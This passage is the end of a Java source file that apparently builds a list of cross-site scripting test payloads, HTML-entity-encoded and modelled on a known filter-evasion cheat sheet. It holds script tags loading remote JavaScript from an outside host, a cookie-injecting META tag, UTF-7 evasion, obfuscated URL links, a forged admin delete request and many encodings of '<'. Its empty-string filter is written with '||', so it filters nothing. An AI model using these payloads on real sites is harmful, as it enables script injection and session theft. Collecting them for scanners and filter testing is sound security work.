                + "&lt;IMG SRC=\\\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\\\"&gt;\n"
                + "Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser\n"
                + "&lt;META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\\\"&gt;\n"
                + "&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n"
                + "&lt;SCRIPT a=\\\"&gt;\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT =\\\"&gt;\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT a=\\\"&gt;\\\" '' SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT \\\"a='&gt;'\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT a=`&gt;` SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT a=\\\"&gt;'&gt;\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT&gt;document&#46;write(\\\"&lt;SCRI\\\");&lt;/SCRIPT&gt;PT SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//66&#46;102&#46;7&#46;147/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//1113982867/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"//www&#46;google&#46;com/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"//google\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//ha&#46;ckers&#46;org@google\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//google&#58;ha&#46;ckers&#46;org\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//google&#46;com/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//www&#46;google&#46;com&#46;/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=\\\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\\\"&gt;XSS&lt;/A&gt;\n"
                + "&lt;\n"
                + "%3C\n"
                + "&lt\n"
                + "&lt;\n"
                + "&LT\n"
                + "&LT;\n"
                + "&#60\n"
                + "&#060\n"
                + "&#0060\n"
                + "&#00060\n"
                + "&#000060\n"
                + "&#0000060\n"
                + "&lt;\n"
                + "&#x3c\n"
                + "&#x03c\n"
                + "&#x003c\n"
                + "&#x0003c\n"
                + "&#x00003c\n"
                + "&#x000003c\n"
                + "&#x3c;\n"
                + "&#x03c;\n"
                + "&#x003c;\n"
                + "&#x0003c;\n"
                + "&#x00003c;\n"
                + "&#x000003c;\n"
                + "&#X3c\n"
                + "&#X03c\n"
                + "&#X003c\n"
                + "&#X0003c\n"
                + "&#X00003c\n"
                + "&#X000003c\n"
                + "&#X3c;\n"
                + "&#X03c;\n"
                + "&#X003c;\n"
                + "&#X0003c;\n"
                + "&#X00003c;\n"
                + "&#X000003c;\n"
                + "&#x3C";

        for (String x : payload.split("\n")) {
            if (x != null || !x.equals("")) {
                list.add(x);
            }
        }
        return list;
    }
}
